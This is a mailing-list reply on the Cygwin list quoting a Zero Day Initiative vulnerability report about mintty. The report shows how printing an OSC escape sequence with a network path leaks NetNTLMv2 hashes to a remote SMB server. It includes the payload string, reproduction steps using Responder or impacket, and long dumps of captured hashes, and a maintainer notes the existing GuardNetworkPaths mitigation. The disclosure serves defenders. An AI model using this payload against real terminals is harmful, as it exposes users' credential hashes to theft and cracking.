Am 16.08.2024 um 16:25 schrieb zdi-disclosures--- via Cygwin:
The attachment could not be scanned for viruses because it is a password protected file. ZDI-CAN-24744: Mintty Path Conversion Improper Input Validation Information Disclosure Vulnerability
???
-- CVSS ----------------------------------------- 5.3: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N -- ABSTRACT ------------------------------------- Trend Micro's Zero Day Initiative has identified a vulnerability affecting the following products: Mintty - Mintty -- VULNERABILITY DETAILS ------------------------ * Version tested:3.7.1 (Git-2.45.2-64-bit.exe) * Installer file:Git-2.45.2-64-bit.exe * Platform tested:win11 23h2 [Version 10.0.22631.3593] --- ### Analysis ``` Several escape sequences can cause the mintty process to access a file in a specific path, It is triggered by simply printing them out on bash, eg. \x1b]7773;//0.0.0.0/test\007 An attacker can specify an arbitrary network path, negotiate an ntlm hash out of the victim's machine to an attacker controlled remote host. NetNTLMv2 hashes can be used to Pass the Hash, or password cracking using tools like hashcat or johntheripper. It's caused by an api provided by msys2. The api is used to convert between posix and windows paths, but it also checks for symbolic links, which is enough to trigger the vulnerability. The same code is forked from cygwin, so it could also be theoretically vulnerable, In the exploit, It used the escape code for setting the terminal icon OSC 7773, but it can be done with other escape codes as well. For example, there's an escape code for indicating the cwd of the shell, which can lead to mintty `stat`ing the directory, which is sufficient for exploitation. ``` The following cover most of the escape codes that could be exploited: ``` - OSC I / OSC 7773 - OSC 440 - OSC 11 - OSC 7 - OSC 8 ```
Since mintty 3.7.0, option GuardNetworkPaths and its default setting prevents this exploit. Thomas
The call stack is roughly the following: ``` mintty: src/winmain.c:308 - guardpath src/charset.c:1104 - path_posix_to_win_w msys2: cygwin_create_path (depends on mintty's compilation flags, but it calls cygwin_conv_path regardless) winsup/cygwin/path.cc:3909 - cygwin_conv_path winsup/cygwin/path.cc:660 - path_conv::check ``` `path_conv::check` calls several windows apis that cause a connection to a remote path to be initiated. Here is the reproduce steps. Setup an attacker vm (Linux based) and a victim vm (windows). Modify the payload for the appropriate ip address (attacker vm's ip): ``` \x1b]7773;//0.0.0.0/test\007 ``` On the Attacker's machine run either [impacket](https://github.com/fortra/impacket)'s smbserver.py or [Responder](https://github.com/lgandx/Responder) with smb server enabled: ``` sudo smbserver.py -ts -smb2support test . ``` ``` sudo ./Responder.py -I enp1s0 -v ``` Replace `enp1s0` with the proper interface. Make sure that other smb services aren't running: ``` systemctl status smbd.service systemctl status nmbd.service ``` Print the adjusted payload from the beginning in mintty (git-bash.exe). The victim's hash should be printed by impacket or Responder. Here is the output from responder ``` [+] Listening for events... [SMB] NTLMv2-SSP Client : 172.16.16.237 [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:38cf5ca194861c7c:05F329D7F39AEFE3C744671936ABC00E:010100000000000000D29167A9CCDA0195D8F1578A8B58C30000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 [SMB] NTLMv2-SSP Client : 172.16.16.237 [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:331cb34ad722601a:F71C80EE1309C62CA4FF8E254A7AC1AE:010100000000000000D29167A9CCDA0142C3153183B226600000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 [SMB] NTLMv2-SSP Client : 172.16.16.237 [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:b5bc3a6e83c4d7d7:40218E62EF8DCA0023C166B568781059:010100000000000000D29167A9CCDA01797E79F388A237B30000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 [SMB] NTLMv2-SSP Client : 172.16.16.237 [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:ae5464fd841bcab6:F76567E68408F2B04E41B869711E76F8:010100000000000000D29167A9CCDA01E0A7FFF1FF381FA60000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 [SMB] NTLMv2-SSP Client : 172.16.16.237 [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:3bd0a49004b53416:F21B104294C18C82464FEDDC572E6231:010100000000000000D29167A9CCDA01BAAEF54AF54B72560000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 [SMB] NTLMv2-SSP Client : 172.16.16.237 [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:c089b70c3accfaf7:E6B708A8DA76027A16E76F79F5F24333:010100000000000000D29167A9CCDA01433CAD8EC5BCC31A0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 [SMB] NTLMv2-SSP Client : 172.16.16.237 [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:daa3eae276eaef28:AE4059F544451A21F5779DFB3192D9DA:010100000000000000D29167A9CCDA0110F73C1AE7035F2B0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 [SMB] NTLMv2-SSP Client : 172.16.16.237 [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:56c7b5b6c66d156a:96665824D373D99E5F043EFE7724BCF1:010100000000000000D29167A9CCDA012F33E5442DE0DDD40000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 [SMB] NTLMv2-SSP Client : 172.16.16.237 [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:44db8723d9666e80:2DAC87BC05CCECEB4BC8BFD8A9ED2317:010100000000000000D29167A9CCDA014DFB0815892812720000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 [SMB] NTLMv2-SSP Client : 172.16.16.237 [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:4f6f6e6df73e1d2c:884C66B57E2711811EE502E0796E8138:010100000000000000D29167A9CCDA0148213EEACAF1B7200000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 [SMB] NTLMv2-SSP Client : 172.16.16.237 [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:f1f9c2482522cd95:A0790CFB87DD01F4E10F57F94D487109:010100000000000000D29167A9CCDA01F1D6F8F5882213640000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 [SMB] NTLMv2-SSP Client : 172.16.16.237 [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:0a070bdf7688033f:C4B1F0D2CF4B23B7475AAB780FBCB685:010100000000000000D29167A9CCDA01C53624960CE78E120000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 [SMB] NTLMv2-SSP Client : 172.16.16.237 [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:e8f874be1a16042c:255BDD064E5A8C080FC3E0438A1D3502:010100000000000000D29167A9CCDA01F2A0B31CD1B4EB190000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 [SMB] NTLMv2-SSP Client : 172.16.16.237 [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:b7e3a6f69f1ba3dc:4FBC3B5E8781619637C21E21575EB522:010100000000000000D29167A9CCDA0161610316FA9D3D4E0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 [SMB] NTLMv2-SSP Client : 172.16.16.237 [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:9bceb9d050c9b28f:1618EE69D7DEA633EBD38C27ACC89190:010100000000000000D29167A9CCDA01D3E44752D8FA554B0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 ``` procmon log ``` Date: 7/8/2024 2:07:57.3678237 PM Thread: 4844 Class: File System Operation: CreateFile Result: ACCESS DENIED Path: \\[attacker IP]\test007\ Duration: 0.0112557 Desired Access: Read EA, Read Attributes, Read Control Disposition: Open Options: Open Reparse Point Attributes: n/a ShareMode: Read, Write, Delete AllocationSize: n/a Description: Company: Name: bash.exe Version: Path: C:\Program Files\Git\usr\bin\bash.exe Command Line: "C:\Program Files\Git\usr\bin\bash.exe" --login -i PID: 6172 Parent PID: 1844 Session ID: 1 User: DESKTOP-QAVUII5\wmliang Auth ID: 00000000:0015a222 Architecture: 64-bit Virtualized: False Integrity: Medium Started: 7/8/2024 2:07:57 PM Ended: 7/8/2024 2:07:57 PM Modules: bash.exe 0x100400000 0x245000 C:\Program Files\Git\usr\bin\bash.exe 1/14/2024 5:25:36 AM msys-2.0.dll 0x210040000 0x1227000 C:\Program Files\Git\usr\bin\msys-2.0.dll Red Hat 3.4.10-87d5722901e1172a57aa4d4e3db84fbafe70d19b 2/14/2024 4:11:38 PM 0 FLTMGR.SYS FltGetStreamContext + 0x20cb 0xfffff8045abe961b C:\Windows\System32\drivers\FLTMGR.SYS 1 FLTMGR.SYS FltGetStreamContext + 0x1b51 0xfffff8045abe90a1 C:\Windows\System32\drivers\FLTMGR.SYS 2 FLTMGR.SYS FltRequestFileInfoOnCreateCompletion + 0x4ef 0xfffff8045ac21f6f C:\Windows\System32\drivers\FLTMGR.SYS 3 ntoskrnl.exe IofCallDriver + 0x55 0xfffff80455c29b45 C:\Windows\system32\ntoskrnl.exe 4 ntoskrnl.exe ProbeForWrite + 0x40fe 0xfffff8045619c8be C:\Windows\system32\ntoskrnl.exe 5 ntoskrnl.exe ObOpenObjectByNameEx + 0x1844 0xfffff804560cc9e4 C:\Windows\system32\ntoskrnl.exe 6 ntoskrnl.exe ObOpenObjectByNameEx + 0x1f2 0xfffff804560cb392 C:\Windows\system32\ntoskrnl.exe 7 ntoskrnl.exe NtCreateFile + 0x4c1 0xfffff80456194311 C:\Windows\system32\ntoskrnl.exe 8 ntoskrnl.exe NtCreateFile + 0x79 0xfffff80456193ec9 C:\Windows\system32\ntoskrnl.exe 9 ntoskrnl.exe setjmpex + 0x9045 0xfffff80455e2d505 C:\Windows\system32\ntoskrnl.exe 10 ntdll.dll NtCreateFile + 0x14 0x7ffb3fdf03f4 C:\Windows\System32\ntdll.dll 11 msys-2.0.dll setpassent + 0x2ff3 0x2100929c3 C:\Program Files\Git\usr\bin\msys-2.0.dll 12 msys-2.0.dll cygwin_split_path + 0x2c68 0x210096988 C:\Program Files\Git\usr\bin\msys-2.0.dll 13 msys-2.0.dll sigfillset + 0x6935 0x2100c40a5 C:\Program Files\Git\usr\bin\msys-2.0.dll 14 msys-2.0.dll sigfillset + 0x7f98 0x2100c5708 C:\Program Files\Git\usr\bin\msys-2.0.dll 15 msys-2.0.dll sigfillset + 0x9f81 0x2100c76f1 C:\Program Files\Git\usr\bin\msys-2.0.dll 16 msys-2.0.dll timegm + 0x4db 0x210193f2b C:\Program Files\Git\usr\bin\msys-2.0.dll 17 <unknown> 0x110000000 0x110000000 ``` -- CREDIT --------------------------------------- This vulnerability was discovered by: solid-snail working with Trend Micro Zero Day Initiative -- FURTHER DETAILS ------------------------------ Supporting files: If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number. Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up to the deadline, please coordinate with us so that we may release our advisory detailing the issue. If the 120-day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations, so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time: Zero Day Initiative zdi-disclosu...@trendmicro.com The PGP key used for all ZDI vendor communications is available from: http://www.zerodayinitiative.com/documents/disclosures-pgp-key.asc -- INFORMATION ABOUT THE ZDI -------------------- Established by TippingPoint and acquired by Trend Micro, the Zero Day Initiative (ZDI) neither re-sells vulnerability details nor exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its Trend Micro TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Please contact us for further details or refer to: http://www.zerodayinitiative.com -- DISCLOSURE POLICY ---------------------------- Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ TREND MICRO EMAIL NOTICE The information contained in this email and any attachments is confidential and may be subject to copyright or other intellectual property protection. If you are not the intended recipient, you are not authorized to use or disclose this information, and we request that you notify us by reply mail or telephone and delete the original message from your mail system. For details about what personal information we collect and why, please see our Privacy Notice on our website at: Read privacy policy<http://www.trendmicro.com/privacy>
-- Problem reports: https://cygwin.com/problems.html FAQ: https://cygwin.com/faq/ Documentation: https://cygwin.com/docs.html Unsubscribe info: https://cygwin.com/ml/#unsubscribe-simple
